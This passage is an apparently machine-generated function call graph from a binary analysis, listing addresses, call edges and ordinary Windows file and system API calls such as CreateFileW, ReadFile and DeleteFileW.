__free_lconv_mon 107019->107021 107021->107016 107022 7ffb0c685430 107037 7ffb0c79b8a0 107022->107037 107024 7ffb0c68544c 107034 7ffb0c685563 _raise_excf 107024->107034 107056 7ffb0c761fc0 107024->107056 107027 7ffb0c6854f9 107027->107034 107035 7ffb0c685548 107027->107035 107134 7ffb0c7a27e0 11 API calls _raise_excf 107027->107134 107029 7ffb0c6854b3 107029->107027 107031 7ffb0c6854cd 107029->107031 107133 7ffb0c7a0e80 11 API calls _raise_excf 107029->107133 107031->107027 107061 7ffb0c70f5d0 107031->107061 107032 7ffb0c684c20 _raise_excf 11 API calls 107032->107034 107035->107032 107035->107034 107038 7ffb0c79b8ad 107037->107038 107039 7ffb0c79b8b5 _raise_excf 107037->107039 107038->107024 107041 7ffb0c79b93c new[] _raise_excf 107039->107041 107055 7ffb0c79bc14 107039->107055 107144 7ffb0c79b1d0 11 API calls _raise_excf 107039->107144 107045 7ffb0c79badf 107041->107045 107041->107055 107145 7ffb0c79b1d0 11 API calls _raise_excf 107041->107145 107042 7ffb0c79b8a0 _raise_excf 12 API calls 107043 7ffb0c79bb0c 107042->107043 107046 7ffb0c761fc0 new[] 11 API calls 107043->107046 107043->107055 107045->107042 107045->107055 107047 7ffb0c79bb1c 107046->107047 107048 7ffb0c684c20 _raise_excf 11 API calls 107047->107048 107047->107055 107049 7ffb0c79bb2d 107048->107049 107135 7ffb0c79be70 GetSystemInfo 107049->107135 107052 7ffb0c79b8a0 _raise_excf 12 API calls 107054 7ffb0c79bb41 107052->107054 107053 7ffb0c79b8a0 _raise_excf 12 API calls 107053->107055 107054->107053 107054->107055 107055->107024 107057 7ffb0c761fd9 107056->107057 107058 7ffb0c68546f 107056->107058 107057->107058 107146 7ffb0c6839b0 107057->107146 107058->107027 107060 7ffb0c78afa0 11 API calls _raise_excf 107058->107060 107060->107029 107062 7ffb0c79b8a0 _raise_excf 12 API calls 107061->107062 107064 7ffb0c70f607 107062->107064 107063 7ffb0c70fec6 107063->107027 107064->107063 107065 7ffb0c761fc0 new[] 11 API calls 107064->107065 107066 7ffb0c70f67d new[] 107065->107066 107067 7ffb0c70f6e3 107066->107067 107069 7ffb0c70f6a6 107066->107069 107070 7ffb0c70f6ba 107066->107070 107094 7ffb0c70f6b2 107066->107094 107151 7ffb0c6ad050 107067->107151 107071 7ffb0c684c20 _raise_excf 11 API calls 107069->107071 107070->107067 107075 7ffb0c70f6d3 107070->107075 107071->107094 107073 7ffb0c70f7e1 107074 7ffb0c6ad050 11 API calls 107073->107074 107076 7ffb0c70f800 107074->107076 107077 7ffb0c684c20 _raise_excf 11 API calls 107075->107077 107078 7ffb0c6ad050 11 API calls 107076->107078 107077->107094 107079 7ffb0c70f81f 107078->107079 107081 7ffb0c6ad050 11 API calls 107079->107081 107080 7ffb0c70fa11 107080->107063 107082 7ffb0c684c20 _raise_excf 11 API calls 107080->107082 107083 7ffb0c70f846 107081->107083 107082->107063 107084 7ffb0c6ad050 11 API calls 107083->107084 107085 7ffb0c70f86d 107084->107085 107086 7ffb0c70f89e 107085->107086 107087 7ffb0c70f892 107085->107087 107091 7ffb0c70f91e 107085->107091 107224 7ffb0c7657f0 12 API calls 2 library calls 107086->107224 107223 7ffb0c762770 11 API calls _raise_excf 107087->107223 107090 7ffb0c70f89c 107092 7ffb0c70f8f3 107090->107092 107093 7ffb0c70fa1a 107090->107093 107091->107094 107097 7ffb0c70f9da 107091->107097 107095 7ffb0c70f900 107092->107095 107225 7ffb0c763030 11 API calls _raise_excf 107092->107225 107165 7ffb0c72df40 107093->107165 107094->107080 107200 7ffb0c7300e0 107094->107200 107226 7ffb0c739000 11 API calls _raise_excf 107095->107226 107227 7ffb0c698730 11 API calls _raise_excf 107097->107227 107099 7ffb0c70fa40 107102 7ffb0c70fa44 107099->107102 107106 7ffb0c70fa64 _raise_excf 107099->107106 107229 7ffb0c738e50 11 API calls _raise_excf 107102->107229 107103 7ffb0c70f9f0 107228 7ffb0c698730 11 API calls _raise_excf 107103->107228 107230 7ffb0c7715e0 11 API calls 2 library calls 107106->107230 107108 7ffb0c70fa90 _raise_excf 107231 7ffb0c7715e0 11 API calls 2 library calls 107108->107231 107110 7ffb0c70fad5 107110->107091 107111 7ffb0c70fb36 107110->107111 107232 7ffb0c738e50 11 API calls _raise_excf 107110->107232 107233 7ffb0c693030 12 API calls _raise_excf 107111->107233 107114 7ffb0c70fb54 107115 7ffb0c70fb61 107114->107115 107234 7ffb0c763030 11 API calls _raise_excf 107114->107234 107117 7ffb0c70fb71 107115->107117 107119 7ffb0c70fbb7 107115->107119 107235 7ffb0c698730 11 API calls _raise_excf 107117->107235 107121 7ffb0c70fbaf 107119->107121 107131 7ffb0c70fc05 107119->107131 107120 7ffb0c70fb87 107236 7ffb0c698730 11 API calls _raise_excf 107120->107236 107240 7ffb0c738e50 11 API calls _raise_excf 107121->107240 107122 7ffb0c70fd4c 107125 7ffb0c70fda2 107122->107125 107127 7ffb0c70fd5f 107122->107127 107125->107091 107241 7ffb0c725640 11 API calls 2 library calls 107125->107241 107238 7ffb0c698730 11 API calls _raise_excf 107127->107238 107129 7ffb0c70fd75 107239 7ffb0c698730 11 API calls _raise_excf 107129->107239 107131->107122 107237 7ffb0c739000 11 API calls _raise_excf 107131->107237 107133->107031 107134->107035 107136 7ffb0c79b8a0 _raise_excf 11 API calls 107135->107136 107139 7ffb0c79beaa 107136->107139 107137 7ffb0c79b8a0 _raise_excf 11 API calls 107141 7ffb0c79bf5f 107137->107141 107138 7ffb0c79b8a0 _raise_excf 11 API calls 107142 7ffb0c79c031 107138->107142 107139->107137 107140 7ffb0c79b8a0 _raise_excf 11 API calls 107143 7ffb0c79bb32 107140->107143 107141->107138 107142->107140 107143->107052 107143->107055 107144->107041 107145->107045 107147 7ffb0c6839c5 107146->107147 107148 7ffb0c6839df 107147->107148 107150 7ffb0c698730 11 API calls _raise_excf 107147->107150 107148->107058 107150->107148 107152 7ffb0c6ad079 107151->107152 107156 7ffb0c6ad0bf _raise_excf 107151->107156 107153 7ffb0c6ad082 107152->107153 107152->107156 107242 7ffb0c698730 11 API calls _raise_excf 107153->107242 107155 7ffb0c6ad0ac 107155->107073 107158 7ffb0c6ad11d 107156->107158 107164 7ffb0c6ad149 _raise_excf 107156->107164 107243 7ffb0c739000 11 API calls _raise_excf 107158->107243 107159 7ffb0c6ad1ec 107163 7ffb0c6ad1f4 107159->107163 107245 7ffb0c738e50 11 API calls _raise_excf 107159->107245 107161 7ffb0c6ad131 107161->107073 107163->107073 107244 7ffb0c73fac0 11 API calls 2 library calls 107164->107244 107167 7ffb0c72df8f 107165->107167 107166 7ffb0c761fc0 new[] 11 API calls 107172 7ffb0c72e009 107166->107172 107167->107166 107168 7ffb0c72e260 107169 7ffb0c761fc0 new[] 11 API calls 107168->107169 107196 7ffb0c72e4bb 107168->107196 107170 7ffb0c72e27d 107169->107170 107171 7ffb0c72e552 107170->107171 107246 7ffb0c7640d0 107170->107246 107174 7ffb0c684c20 _raise_excf 11 API calls 107171->107174 107172->107168 107175 7ffb0c761fc0 new[] 11 API calls 107172->107175 107194 7ffb0c72e0ad _raise_excf 107172->107194 107176 7ffb0c72e754 107174->107176 107177 7ffb0c72e099 107175->107177 107179 7ffb0c684c20 _raise_excf 11 API calls 107176->107179 107178 7ffb0c72e0a5 107177->107178 107183 7ffb0c72e0d6 107177->107183 107180 7ffb0c684c20 _raise_excf 11 API calls 107178->107180 107179->107194 107180->107194 107181 7ffb0c72e2ea _raise_excf 107190 7ffb0c72e374 107181->107190 107181->107196 107272 7ffb0c6736f0 107181->107272 107184 7ffb0c72e128 107183->107184 107192 7ffb0c72e0df _raise_excf 107183->107192 107185 7ffb0c684c20 _raise_excf 11 API calls 107184->107185 107187 7ffb0c72e130 107185->107187 107186 7ffb0c72e1f5 107189 7ffb0c684c20 _raise_excf 11 API calls 107186->107189 107188 7ffb0c684c20 _raise_excf 11 API calls 107187->107188 107188->107194 107189->107168 107190->107196 107280 7ffb0c764ea0 11 API calls _raise_excf 107190->107280 107192->107186 107193 7ffb0c72e448 107192->107193 107195 7ffb0c684c20 _raise_excf 11 API calls 107193->107195 107194->107099 107197 7ffb0c72e47f 107195->107197 107196->107171 107196->107194 107281 7ffb0c7638b0 107196->107281 107198 7ffb0c684c20 _raise_excf 11 API calls 107197->107198 107198->107194 107201 7ffb0c7300f6 107200->107201 107202 7ffb0c730104 107200->107202 107201->107080 107203 7ffb0c730114 107202->107203 107206 7ffb0c730167 _raise_excf 107202->107206 107409 7ffb0c698730 11 API calls _raise_excf 107203->107409 107205 7ffb0c73012c 107410 7ffb0c698730 11 API calls _raise_excf 107205->107410 107211 7ffb0c730215 107206->107211 107411 7ffb0c78ddb0 11 API calls _raise_excf 107206->107411 107208 7ffb0c73024d 107209 7ffb0c78ec40 _raise_excf 11 API calls 107208->107209 107213 7ffb0c730255 _raise_excf 107209->107213 107210 7ffb0c730156 107210->107080 107211->107208 107412 7ffb0c78ddb0 11 API calls _raise_excf 107211->107412 107377 7ffb0c6a4410 107213->107377 107216 7ffb0c730270 107219 7ffb0c730281 107216->107219 107222 7ffb0c7302c0 107216->107222 107413 7ffb0c739000 11 API calls _raise_excf 107219->107413 107221 7ffb0c730294 107221->107080 107383 7ffb0c760790 107222->107383 107223->107090 107224->107090 107225->107095 107226->107091 107227->107103 107228->107080 107229->107091 107230->107108 107231->107110 107232->107111 107233->107114 107234->107115 107235->107120 107236->107121 107237->107131 107238->107129 107239->107091 107240->107125 107241->107091 107242->107155 107243->107161 107244->107159 107245->107163 107247 7ffb0c7642a5 107246->107247 107250 7ffb0c76415e 107246->107250 107251 7ffb0c761fc0 new[] 11 API calls 107247->107251 107255 7ffb0c764187 _raise_excf 107247->107255 107248 7ffb0c761fc0 new[] 11 API calls 107249 7ffb0c7641ff 107248->107249 107252 7ffb0c76494e 107249->107252 107259 7ffb0c76420b new[] _raise_excf 107249->107259 107250->107250 107253 7ffb0c761fc0 new[] 11 API calls 107250->107253 107250->107255 107261 7ffb0c7642cc 107251->107261 107254 7ffb0c684c20 _raise_excf 11 API calls 107252->107254 107269 7ffb0c7643de _raise_excf 107252->107269 107253->107255 107254->107269 107255->107248 107255->107269 107256 7ffb0c76443c 107270 7ffb0c7644a0 _raise_excf 107256->107270 107293 7ffb0c674510 107256->107293 107259->107256 107268 7ffb0c684c20 _raise_excf 11 API calls 107259->107268 107260 7ffb0c7643d6 107263 7ffb0c684c20 _raise_excf 11 API calls 107260->107263 107261->107255 107261->107260 107261->107269 107310 7ffb0c72fb50 11 API calls _raise_excf 107261->107310 107262 7ffb0c764732 107262->107269 107312 7ffb0c715910 107262->107312 107263->107269 107266 7ffb0c684c20 _raise_excf 11 API calls 107266->107269 107267 7ffb0c7643c7 107267->107255 107267->107260 107268->107256 107269->107181 107270->107262 107311 7ffb0c764ea0 11 API calls _raise_excf 107270->107311 107273 7ffb0c67371d _raise_excf 107272->107273 107274 7ffb0c6737a0 ReadFile 107273->107274 107275 7ffb0c673858 107273->107275 107277 7ffb0c673734 new[] _raise_excf 107273->107277 107278 7ffb0c673830 107273->107278 107274->107273 107274->107275 107275->107277 107328 7ffb0c698730 11 API calls _raise_excf 107275->107328 107277->107190 107327 7ffb0c7b1a30 19 API calls _raise_excf 107278->107327 107280->107196 107283 7ffb0c7638e3 _raise_excf 107281->107283 107329 7ffb0c78f260 107283->107329 107285 7ffb0c7639cd _raise_excf 107287 7ffb0c763a14 _raise_excf 107285->107287 107351 7ffb0c711310 30 API calls _raise_excf 107285->107351 107286 7ffb0c715910 _raise_excf 11 API calls 107288 7ffb0c763af3 107286->107288 107287->107286 107341 7ffb0c67da70 107288->107341 107296 7ffb0c674561 107293->107296 107297 7ffb0c6749d1 107296->107297 107299 7ffb0c6747c0 CreateFileW 107296->107299 107302 7ffb0c674aac 107296->107302 107303 7ffb0c684c20 _raise_excf 11 API calls 107296->107303 107305 7ffb0c674a72 107296->107305 107309 7ffb0c6749d9 _raise_excf 107296->107309 107316 7ffb0c7b28d0 107296->107316 107322 7ffb0c7b1210 20 API calls 2 library calls 107296->107322 107323 7ffb0c677490 19 API calls _raise_excf 107296->107323 107324 7ffb0c698730 11 API calls _raise_excf 107296->107324 107298 7ffb0c684c20 _raise_excf 11 API calls 107297->107298 107298->107309 107299->107296 107304 7ffb0c684c20 _raise_excf 11 API calls 107302->107304 107303->107296 107304->107309 107325 7ffb0c7b1a30 19 API calls _raise_excf 107305->107325 107307 7ffb0c674a9d 107326 7ffb0c72fb50 11 API calls _raise_excf 107307->107326 107309->107270 107310->107267 107311->107262 107313 7ffb0c7159fd 107312->107313 107314 7ffb0c715919 107312->107314 107313->107266 107314->107313 107315 7ffb0c684c20 _raise_excf 11 API calls 107314->107315 107315->107313 107317 7ffb0c7b2915 107316->107317 107318 7ffb0c761fc0 new[] 11 API calls 107317->107318 107320 7ffb0c7b2971 107317->107320 107319 7ffb0c7b292a new[] 107318->107319 107319->107320 107321 7ffb0c684c20 _raise_excf 11 API calls 107319->107321 107320->107296 107321->107320 107322->107296 107323->107296 107324->107296 107325->107307 107326->107309 107327->107277 107328->107277 107330 7ffb0c78f3e1 107329->107330 107331 7ffb0c78f28f 107329->107331 107330->107285 107333 7ffb0c78f34f _raise_excf 107331->107333 107366 7ffb0c78ef90 30 API calls _raise_excf 107331->107366 107332 7ffb0c78f3be 107335 7ffb0c684c20 _raise_excf 11 API calls 107332->107335 107333->107332 107352 7ffb0c674d70 107333->107352 107336 7ffb0c78f3d9 107335->107336 107337 7ffb0c684c20 _raise_excf 11 API calls 107336->107337 107337->107330 107338 7ffb0c78f303 107338->107333 107367 7ffb0c7a9310 11 API calls _raise_excf 107338->107367 107342 7ffb0c67da8d 107341->107342 107343 7ffb0c67da86 107341->107343 107370 7ffb0c715620 107342->107370 107376 7ffb0c715bc0 11 API calls _raise_excf 107343->107376 107347 7ffb0c684c20 _raise_excf 11 API calls 107348 7ffb0c67dab6 107347->107348 107349 7ffb0c684c20 _raise_excf 11 API calls 107348->107349 107350 7ffb0c67dabf 107349->107350 107351->107287 107353 7ffb0c7b28d0 11 API calls 107352->107353 107354 7ffb0c674d93 107353->107354 107355 7ffb0c674da5 GetFileAttributesW 107354->107355 107356 7ffb0c674d9b 107354->107356 107357 7ffb0c674e50 107355->107357 107365 7ffb0c674dc3 107355->107365 107356->107332 107358 7ffb0c674e67 107357->107358 107360 7ffb0c674e8d 107357->107360 107368 7ffb0c7b1a30 19 API calls _raise_excf 107358->107368 107359 7ffb0c674dd8 DeleteFileW 107359->107360 107359->107365 107362 7ffb0c674e85 107360->107362 107369 7ffb0c698730 11 API calls _raise_excf 107360->107369 107364 7ffb0c684c20 _raise_excf 11 API calls 107362->107364 107364->107356 107365->107357 107365->107358 107365->107359 107366->107338 107367->107333 107368->107362 107369->107362 107371 7ffb0c7156eb 107370->107371 107372 7ffb0c715643 107370->107372 107373 7ffb0c684c20 _raise_excf 11 API calls 107371->107373 107374 7ffb0c67daad 107371->107374 107372->107371 107375 7ffb0c715910 _raise_excf 11 API calls 107372->107375 107373->107374 107374->107347 107375->107372 107376->107342 107379 7ffb0c6a44b9 _raise_excf 107377->107379 107380 7ffb0c6a442f 107377->107380 107378 7ffb0c6a4498 107378->107379 107381 7ffb0c684c20 _raise_excf 11 API calls 107378->107381 107379->107216 107380->107378 107414 7ffb0c78eb70 11 API calls _raise_excf 107380->107414 107381->107379 107384 7ffb0c7607a5 107383->107384 107407 7ffb0c730381 107383->107407 107384->107407 107415 7ffb0c76f170 107384->107415 107386 7ffb0c760851 107387 7ffb0c760863 107386->107387 107446 7ffb0c771490 11 API calls 2 library calls 107386->107446 107389 7ffb0c78ec40 _raise_excf 11 API calls 107387->107389 107391 7ffb0c76086b 107389->107391 107437 7ffb0c731da0 107391->107437 107392 7ffb0c760802 _raise_excf 107392->107386 107423 7ffb0c72c010 107392->107423 107394 7ffb0c760873 _raise_excf 107443 7ffb0c75cf90 107394->107443 107396 7ffb0c75cf90 _raise_excf 11 API calls 107404 7ffb0c760bc2 _raise_excf 107396->107404 107397 7ffb0c760d0d 107398 7ffb0c75cf90 _raise_excf 11 API calls 107397->107398 107399 7ffb0c760d19 107398->107399 107406 7ffb0c760d62 _raise_excf 107399->107406 107448 7ffb0c738e50 11 API calls _raise_excf 107399->107448 107402 7ffb0c760d39 107402->107406 107449 7ffb0c7a27e0 11 API calls _raise_excf 107402->107449 107403 7ffb0c760a86 _raise_excf 107403->107396 107404->107397 107447 7ffb0c6ae530 11 API calls _raise_excf 107404->107447 107406->107407 107408 7ffb0c7c996c 11 API calls 107406->107408 107407->107080 107408->107407 107409->107205 107410->107210 107411->107206 107412->107211 107413->107221 107414->107380 107418 7ffb0c76f19f _raise_excf 107415->107418 107416 7ffb0c6a4410 _raise_excf 11 API calls 107417 7ffb0c76f221 107416->107417 107422 7ffb0c76f27f _raise_excf 107417->107422 107462 7ffb0c76e870 11 API calls _raise_excf 107417->107462 107420 7ffb0c76f20f 107418->107420 107450 7ffb0c72e8c0 107418->107450 107420->107416 107422->107392 107424 7ffb0c72c028 _raise_excf 107423->107424 107425 7ffb0c72e8c0 _raise_excf 30 API calls 107424->107425 107428 7ffb0c72c043 _raise_excf 107425->107428 107426 7ffb0c7638b0 _raise_excf 32 API calls 107427 7ffb0c72c136 107426->107427 107429 7ffb0c72c15c 107427->107429 107430 7ffb0c684c20 _raise_excf 11 API calls 107427->107430 107428->107426 107433 7ffb0c72c18b 107428->107433 107431 7ffb0c715910 _raise_excf 11 API calls 107429->107431 107434 7ffb0c72c178 107429->107434 107430->107429 107431->107434 107432 7ffb0c684c20 _raise_excf 11 API calls 107432->107433 107435 7ffb0c684c20 _raise_excf 11 API calls 107433->107435 107434->107432 107436 7ffb0c72c1ba 107435->107436 107436->107392 107438 7ffb0c731ebe 107437->107438 107439 7ffb0c731dbf _raise_excf 107437->107439 107441 7ffb0c731f31 _raise_excf 107438->107441 107442 7ffb0c684c20 _raise_excf 11 API calls 107438->107442 107439->107438 107440 7ffb0c684c20 _raise_excf 11 API calls 107439->107440 107440->107439 107441->107394 107442->107441 107444 7ffb0c684c20 _raise_excf 11 API calls 107443->107444 107445 7ffb0c75cfb5 107444->107445 107445->107403 107446->107387 107447->107404 107448->107402 107449->107406 107451 7ffb0c72e8e7 _raise_excf 107450->107451 107454 7ffb0c72e911 107451->107454 107467 7ffb0c722250 29 API calls _raise_excf 107451->107467 107455 7ffb0c72e937 107454->107455 107468 7ffb0c72f8b0 29 API calls _raise_excf 107454->107468 107459 7ffb0c72e9dd _raise_excf 107455->107459 107469 7ffb0c764a30 30 API calls _raise_excf 107455->107469 107458 7ffb0c72e9fa _raise_excf 107458->107418 107463 7ffb0c6a2d90 107459->107463 107460 7ffb0c72e953 _raise_excf 107460->107459 107470 7ffb0c711310 30 API calls _raise_excf 107460->107470 107462->107422 107465 7ffb0c6a2dbd _raise_excf 107463->107465 107464 7ffb0c6a2dca 107464->107458 107465->107464 107471 7ffb0c711310 30 API calls _raise_excf 107465->107471 107467->107454 107468->107455 107469->107460 107470->107459 107471->107464 107472 7ffb0c674ef0 107473 7ffb0c675022 107472->107473 107474 7ffb0c674f11 107472->107474 107474->107473 107476 7ffb0c7b2200 107474->107476 107477 7ffb0c7b253f _raise_excf 107476->107477 107481 7ffb0c7b223e 107476->107481 107477->107473 107479 7ffb0c674d70 21 API calls 107479->107481 107481->107477 107481->107479 107483 7ffb0c7b257d 107481->107483 107486 7ffb0c7b2700 107481->107486 107495 7ffb0c7b10a0 11 API calls _raise_excf 107481->107495 107496 7ffb0c698730 11 API calls _raise_excf 107481->107496 107497 7ffb0c7bb834 8 API calls 107483->107497 107485 7ffb0c7b2582 107487 7ffb0c7b2712 107486->107487 107490 7ffb0c7b2758 107486->107490 107489 7ffb0c7b2723 107487->107489 107487->107490 107488 7ffb0c7b27b7 107488->107481 107498 7ffb0c7b1a30 19 API calls _raise_excf 107489->107498 107490->107488 107499 7ffb0c7b1a30 19 API calls _raise_excf 107490->107499 107492 7ffb0c7b2752 107492->107481 107494 7ffb0c7b27b1 107494->107481 107495->107481 107496->107481 107497->107485 107498->107492 107499->107494 107500 7ffb0c775d90 107501 7ffb0c775db6 107500->107501 107506 7ffb0c775e8e 107500->107506 107502 7ffb0c775df7 107501->107502 107503 7ffb0c78fa20 36 API calls 107501->107503 107501->107506 107510 7ffb0c78fa20 107502->107510 107503->107502 107507 7ffb0c78fa20 36 API calls 107508 7ffb0c775e5a 107507->107508 107508->107506 107509 7ffb0c78fa20 36 API calls 107508->107509 107509->107506 107511 7ffb0c78fa37 107510->107511 107513 7ffb0c775e21 107510->107513 107511->107513 107514 7ffb0c78fa20 36 API calls 107511->107514 107515 7ffb0c78f940 36 API calls 107511->107515 107517 7ffb0c722570 107511->107517 107547 7ffb0c7aa3f0 36 API calls 107511->107547 107513->107506 107513->107507 107514->107511 107515->107511 107525 7ffb0c7225c9 107517->107525 107538 7ffb0c7225c5 _raise_excf 107517->107538 107518 7ffb0c722a25 107518->107525 107605 7ffb0c76c3a0 11 API calls 2 library calls 107518->107605 107521 7ffb0c78fa20 36 API calls 107521->107538 107522 7ffb0c723a36 107608 7ffb0c6b35a0 11 API calls _raise_excf 107522->107608 107525->107511 107526 7ffb0c723a4e 107526->107525 107609 7ffb0c738ea0 11 API calls _raise_excf 107526->107609 107529 7ffb0c722b65 107607 7ffb0c738ea0 11 API calls _raise_excf 107529->107607 107532 7ffb0c722b4e 107606 7ffb0c738ea0 11 API calls _raise_excf 107532->107606 107533 7ffb0c73ef80 11 API calls 107542 7ffb0c722a42 _raise_excf 107533->107542 107535 7ffb0c761fc0 11 API calls new[] 107535->107538 107538->107518 107538->107521 107538->107525 107538->107529 107538->107532 107538->107535 107540 7ffb0c738ea0 11 API calls _raise_excf 107538->107540 107548 7ffb0c71cd40 107538->107548 107587 7ffb0c7618e0 107538->107587 107600 7ffb0c761f90 11 API calls _raise_excf 107538->107600 107601 7ffb0c7324b0 12 API calls 2 library calls 107538->107601 107602 7ffb0c7a5f40 36 API calls _raise_excf 107538->107602 107603 7ffb0c7763d0 36 API calls _raise_excf 107538->107603 107604 7ffb0c75d7c0 11 API calls _raise_excf 107538->107604 107540->107538 107541 7ffb0c73f070 11 API calls 107541->107542 107542->107522 107542->107525 107542->107526 107542->107533 107542->107541 107543 7ffb0c761f90 11 API calls _raise_excf 107542->107543 107544 7ffb0c73dd50 11 API calls _raise_excf 107542->107544 107545 7ffb0c6ad830 11 API calls 107542->107545 107546 7ffb0c738ea0 11 API calls _raise_excf 107542->107546 107543->107542 107544->107542 107545->107542 107546->107542 107547->107511 107549 7ffb0c71cd79 107548->107549 107572 7ffb0c71ce2a _raise_excf 107548->107572 107550 7ffb0c71ce1f 107549->107550 107551 7ffb0c71ce8a 107549->107551 107549->107572 107610 7ffb0c738ea0 11 API calls _raise_excf 107550->107610 107553 7ffb0c71ce90 107551->107553 107554 7ffb0c71cea9 107551->107554 107611 7ffb0c738ea0 11 API calls _raise_excf 107553->107611 107556 7ffb0c761fc0 new[] 11 API calls 107554->107556 107557 7ffb0c71ceae _raise_excf 107554->107557 107556->107557 107558 7ffb0c761fc0 new[] 11 API calls 107557->107558 107560 7ffb0c71cf51 107557->107560 107561 7ffb0c71cf07 _raise_excf 107557->107561 107557->107572 107558->107561 107564 7ffb0c761fc0 new[] 11 API calls 107560->107564 107571 7ffb0c71cf72 _raise_excf 107560->107571 107570 7ffb0c71cf7a 107561->107570 107612 7ffb0c766170 11 API calls 2 library calls 107561->107612 107562 7ffb0c71d08b 107566 7ffb0c71d0ad 107562->107566 107562->107572 107580 7ffb0c71d0cb 107562->107580 107564->107571 107565 7ffb0c71cf4c 107565->107560 107565->107570 107614 7ffb0c738ea0 11 API calls _raise_excf 107566->107614 107567 7ffb0c684c20 _raise_excf 11 API calls 107567->107572 107569 7ffb0c71d0ed 107573 7ffb0c71d2e0 107569->107573 107574 7ffb0c71d124 107569->107574 107570->107567 107570->107572 107613 7ffb0c7763d0 36 API calls _raise_excf 107571->107613 107572->107538 107576 7ffb0c78fa20 36 API calls 107573->107576 107575 7ffb0c78fa20 36 API calls 107574->107575 107577 7ffb0c71d13c 107575->107577 107576->107577 107577->107572 107578 7ffb0c71d30d 107577->107578 107581 7ffb0c71d1a4 107577->107581 107617 7ffb0c7324b0 12 API calls 2 library calls 107578->107617 107580->107569 107584 7ffb0c71d2bf 107580->107584 107615 7ffb0c738ea0 11 API calls _raise_excf 107581->107615 107582 7ffb0c71d320 107582->107572 107585 7ffb0c78fa20 36 API calls 107582->107585 107616 7ffb0c738ea0 11 API calls _raise_excf 107584->107616 107585->107572 107588 7ffb0c76190c 107587->107588 107589 7ffb0c761911 _raise_excf 107587->107589 107618 7ffb0c76d630 107588->107618 107591 7ffb0c761a0a 107589->107591 107597 7ffb0c761a0e 107589->107597 107599 7ffb0c7619f7 107589->107599 107622 7ffb0c78dc00 11 API calls 2 library calls 107589->107622 107592 7ffb0c761a50 107591->107592 107593 7ffb0c761a66 107591->107593 107591->107597 107624 7ffb0c738ea0 11 API calls _raise_excf 107592->107624 107625 7ffb0c738ea0 11 API calls _raise_excf 107593->107625 107597->107538 107599->107591 107623 7ffb0c78def0 11 API calls 2 library calls 107599->107623 107600->107538 107601->107538 107602->107538 107603->107538 107604->107538 107605->107542 107606->107525 107607->107525 107608->107526 107609->107525 107610->107572 107611->107572 107612->107565 107613->107562 107614->107572 107615->107572 107616->107572 107617->107582 107619 7ffb0c76d649 107618->107619 107621 7ffb0c76d655 107618->107621 107626 7ffb0c75da40 107619->107626 107621->107589 107622->107599 107623->107591 107624->107597 107625->107597 107627 7ffb0c75da7c 107626->107627 107631 7ffb0c75da89 107626->107631 107632 7ffb0c75de10 107627->107632 107629 7ffb0c75dadd 107629->107621 107630 7ffb0c75de10 _raise_excf 36 API calls 107630->107631 107631->107629 107631->107630 107662 7ffb0c75db10 107632->107662 107634 7ffb0c75dec4 _raise_excf 107638 7ffb0c75deeb _raise_excf 107634->107638 107643 7ffb0c75df54 _raise_excf 107634->107643 107644 7ffb0c75df59 _raise_excf 107634->107644 107697 7ffb0c6a2010 107634->107697 107635 7ffb0c75e370 107715 7ffb0c76e910 11 API calls 2 library calls 107635->107715 107638->107631 107640 7ffb0c75df39 107641 7ffb0c75df3f _raise_excf 107640->107641 107640->107644 107708 7ffb0c776190 11 API calls 2 library calls 107641->107708 107643->107635 107643->107638 107714 7ffb0c763030 11 API calls _raise_excf 107643->107714 107646 7ffb0c75dfc4 _raise_excf 107644->107646 107649 7ffb0c75e00e _raise_excf 107644->107649 107645 7ffb0c75e20a 107709 7ffb0c761f90 11 API calls _raise_excf 107645->107709 107646->107645 107653 7ffb0c75e15f _raise_excf 107646->107653 107658 7ffb0c75dfe9 _raise_excf 107646->107658 107648 7ffb0c75e243 107710 7ffb0c682f50 36 API calls 2 library calls 107648->107710 107652 7ffb0c684c20 _raise_excf 11 API calls 107649->107652 107649->107658 107652->107658 107654 7ffb0c684c20 _raise_excf 11 API calls 107653->107654 107653->107658 107654->107658 107655 7ffb0c75e2f4 107655->107658 107712 7ffb0c76e870 11 API calls _raise_excf 107655->107712 107656 7ffb0c75e271 107659 7ffb0c684c20 _raise_excf 11 API calls 107656->107659 107661 7ffb0c75e297 _raise_excf 107656->107661 107658->107643 107713 7ffb0c72c1d0 32 API calls _raise_excf 107658->107713 107659->107661 107661->107655 107711 7ffb0c7290d0 36 API calls _raise_excf 107661->107711 107663 7ffb0c75db32 107662->107663 107664 7ffb0c75ddc5 107662->107664 107665 7ffb0c75db3b 107663->107665 107666 7ffb0c75db53 107663->107666 107664->107634 107716 7ffb0c6aca80 11 API calls _raise_excf 107665->107716 107670 7ffb0c75dd44 _raise_excf 107666->107670 107671 7ffb0c75db92 _raise_excf 107666->107671 107668 7ffb0c75db46 107668->107634 107670->107664 107726 7ffb0c6aca80 11 API calls _raise_excf 107670->107726 107672 7ffb0c75dbe4 107671->107672 107717 7ffb0c6aca80 11 API calls _raise_excf 107671->107717 107674 7ffb0c76baa0 _raise_excf 36 API calls 107672->107674 107677 7ffb0c75dc20 107674->107677 107675 7ffb0c75dc51 107675->107664 107676 7ffb0c75dc96 107675->107676 107683 7ffb0c75dcdc _raise_excf 107675->107683 107721 7ffb0c698730 11 API calls _raise_excf 107676->107721 107677->107675 107679 7ffb0c75dc49 107677->107679 107680 7ffb0c75dc53 107677->107680 107718 7ffb0c763030 11 API calls _raise_excf 107679->107718 107680->107675 107719 7ffb0c685f90 11 API calls _raise_excf 107680->107719 107681 7ffb0c75dca5 107722 7ffb0c698730 11 API calls _raise_excf 107681->107722 107723 7ffb0c78cc90 36 API calls _raise_excf 107683->107723 107687 7ffb0c75dd0f 107724 7ffb0c77eeb0 11 API calls _raise_excf 107687->107724 107688 7ffb0c75dccd 107688->107634 107689 7ffb0c75dc64 107720 7ffb0c6aca80 11 API calls _raise_excf 107689->107720 107692 7ffb0c75dd19 107693 7ffb0c75dd2d 107692->107693 107725 7ffb0c69ee90 11 API calls _raise_excf 107692->107725 107695 7ffb0c760790 _raise_excf 32 API calls 107693->107695 107696 7ffb0c75dd35 107695->107696 107696->107634 107701 7ffb0c6a204b _raise_excf 107697->107701 107698 7ffb0c6a20a6 _raise_excf 107698->107640 107699 7ffb0c6a22e8 107699->107698 107747 7ffb0c710a00 11 API calls 2 library calls 107699->107747 107701->107698 107701->107699 107706 7ffb0c6a2262 107701->107706 107727 7ffb0c7096b0 107701->107727 107743 7ffb0c711310 30 API calls _raise_excf 107701->107743 107744 7ffb0c763700 RaiseException _raise_excf 107701->107744 107745 7ffb0c70e860 12 API calls _raise_excf 107701->107745 107706->107698 107706->107699 107746 